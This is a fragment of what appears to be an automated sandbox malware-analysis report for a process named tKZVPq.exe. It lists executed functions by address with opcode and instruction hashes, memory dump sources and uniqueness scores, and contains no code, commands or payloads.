                                                            • Opcode Fuzzy Hash: 511faee3d9a9f8cea36a5c1a0df40246a3cfa53d540d2cf6583c1448cb8f4fe4
                                                            • Instruction Fuzzy Hash: 16D0C932A08118CBCB04ABF0E8490ECB776FF8022EB640B75D206A7050DB3248618A50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Analysis Process: tKZVPq.exe PID: 7824 Parent PID: 4412 tKZVPq.exeCOMMON

                                                            Executed Functions

                                                            Function 01750E30, Relevance: .4, Instructions: 440COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1726377195.0000000001750000.00000040.00000001.sdmp, Offset: 01750000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 871f9998ec63df75135b1bae3fe26e19c01f62f9c811d0940b699d269a61019d
                                                            • Instruction ID: 0f080a4cdc3521b01858c34c4e226aaa8ba8bdc06f3ec367567d24784ef26c31
                                                            • Opcode Fuzzy Hash: 871f9998ec63df75135b1bae3fe26e19c01f62f9c811d0940b699d269a61019d
                                                            • Instruction Fuzzy Hash: 8702D130B002199FCB55DFB8C880AAEB7F6FF84315B558968D9059B346DB71EC42CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 017509B0, Relevance: .3, Instructions: 314COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1726377195.0000000001750000.00000040.00000001.sdmp, Offset: 01750000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b4c1d971edbe1f25081e94b20295349a35f077e72cf7ccec7635a557505a34a
                                                            • Instruction ID: f6f4fd0529799196d685fb711ee8e298a9113a1a96ec8263dbf5a335f0b393cf
                                                            • Opcode Fuzzy Hash: 3b4c1d971edbe1f25081e94b20295349a35f077e72cf7ccec7635a557505a34a
                                                            • Instruction Fuzzy Hash: ABD18B34304305DFE755EF38C844A69BBA6FF89304B6484A8E9168B354DFB5EC91CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 017508B0, Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1726377195.0000000001750000.00000040.00000001.sdmp, Offset: 01750000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf14876270a3ac681a1fb83e702ce84794b7a7074b02021a01570e559851adeb
                                                            • Instruction ID: 7e481739c002da7ae66cd0831e32650392b7518b0d74e3b37eef2600d982b858
                                                            • Opcode Fuzzy Hash: bf14876270a3ac681a1fb83e702ce84794b7a7074b02021a01570e559851adeb
                                                            • Instruction Fuzzy Hash: 74212A303046148FC759AB38C458D2D77F2AF8A62932645A8E606CF372DF35DC42CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01751498, Relevance: .1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1726377195.0000000001750000.00000040.00000001.sdmp, Offset: 01750000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c303ff759dd974e09d1d3494813aeca2ef0a1e3d0a81ead0c15dedf4985d40c1
                                                            • Instruction ID: b06b94597b0d62a0c95dd6c8db2acb42398a0249372f8fbb660c7f9678a15713
                                                            • Opcode Fuzzy Hash: c303ff759dd974e09d1d3494813aeca2ef0a1e3d0a81ead0c15dedf4985d40c1
                                                            • Instruction Fuzzy Hash: FE01D630B001149FC714DBB4EC546AE7B79EF85304F1080AED60A9B754CF35AD02CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01751421, Relevance: .0, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1726377195.0000000001750000.00000040.00000001.sdmp, Offset: 01750000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f4951a0abd7c74de038a5588328768dcce17388b0680998a375d4bcaa7560e59
                                                            • Instruction ID: 707a74a1fed29c25b608e8c350f921ae14ebf3ba01cdcecbd91436d56f0c4b83
                                                            • Opcode Fuzzy Hash: f4951a0abd7c74de038a5588328768dcce17388b0680998a375d4bcaa7560e59
                                                            • Instruction Fuzzy Hash: 60F0F032B043245FC30857745C419FB37AEEBC6224714493ED409C7305EE754C0A87A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01750868, Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1726377195.0000000001750000.00000040.00000001.sdmp, Offset: 01750000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44820a44d830d58d5db14f8ebe4988411e414ae37d68936be122fff7c9ab0299
                                                            • Instruction ID: e1862c09bd29f8f16561582652a10f16384e6d9388fb7c2696c533ed65f85c8c
                                                            • Opcode Fuzzy Hash: 44820a44d830d58d5db14f8ebe4988411e414ae37d68936be122fff7c9ab0299
                                                            • Instruction Fuzzy Hash: 08E09B32608119AF9B14DFF9EC485EE7FEDEB4C1617014467F009D3104EE7094504B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01750857, Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1726377195.0000000001750000.00000040.00000001.sdmp, Offset: 01750000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5cb7bf8c9c5594e4192b5a0c92fe1550cbb90a72a4c3e0b1689138aabf32c1b4
                                                            • Instruction ID: 674b9ba2afad546562b5c54881212e35ca2ffb9a15c48c1783d21ae18c29188d
                                                            • Opcode Fuzzy Hash: 5cb7bf8c9c5594e4192b5a0c92fe1550cbb90a72a4c3e0b1689138aabf32c1b4
                                                            • Instruction Fuzzy Hash: 8BF02B71A082489FCB14CFB99C585FEBFF9EE89118714C0EFE409D3202E67098028B11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01751539, Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1726377195.0000000001750000.00000040.00000001.sdmp, Offset: 01750000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53d8b809161b9df3b3670f5d4f14d52993bc72f273a507763719720adbc92bec
                                                            • Instruction ID: 33a801f5095707fc5cc4287281ffc28b86cd1c7e53af0483b21a1541499a9766
                                                            • Opcode Fuzzy Hash: 53d8b809161b9df3b3670f5d4f14d52993bc72f273a507763719720adbc92bec
                                                            • Instruction Fuzzy Hash: 07E0E5306042149FE751AAB8B4502E9666B9B86219B548579C9018B280DB765C064BE2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 017513E0, Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1726377195.0000000001750000.00000040.00000001.sdmp, Offset: 01750000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e178f34363df37ff36e79b2b2434a0ca4856b7dd178ba95034999bc702776b9c
                                                            • Instruction ID: 537ad0005ad1084d26953509702cc4540942b2d4fdb64e964ab19bf49ecc3cd4
                                                            • Opcode Fuzzy Hash: e178f34363df37ff36e79b2b2434a0ca4856b7dd178ba95034999bc702776b9c
                                                            • Instruction Fuzzy Hash: C4E086346052809FD7598F34ED245743FB1EB46202B4594DAD84287156CB785C41CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01751489, Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1726377195.0000000001750000.00000040.00000001.sdmp, Offset: 01750000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 284920381423091b6c4cdfeb6f02a088236be021f0ac0712dbf48d7a527f7a71
                                                            • Instruction ID: afa598557afee6dd40000147cbe004ff9f8141b621736df9c90ad06d27684771
                                                            • Opcode Fuzzy Hash: 284920381423091b6c4cdfeb6f02a088236be021f0ac0712dbf48d7a527f7a71
                                                            • Instruction Fuzzy Hash: 01D0A732B147148BDB11A5A5AC0A1EC7F64DB42252B4400AAD945C7641EF349D1883D2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01751590, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.1726377195.0000000001750000.00000040.00000001.sdmp, Offset: 01750000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f12cbbf1c747d301bd0234b0bb43b7c9bde4f9d8c0193b3d39f833271b617f66
                                                            • Instruction ID: ca0460055e67479643627212e23bdbaf22b09e81a696f44dcbff621ef8c935ae
                                                            • Opcode Fuzzy Hash: f12cbbf1c747d301bd0234b0bb43b7c9bde4f9d8c0193b3d39f833271b617f66
                                                            • Instruction Fuzzy Hash: 84C0126408E3C00FC7926BB018304613F78999712C39A90EA94818A0B3D9A90829D735
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions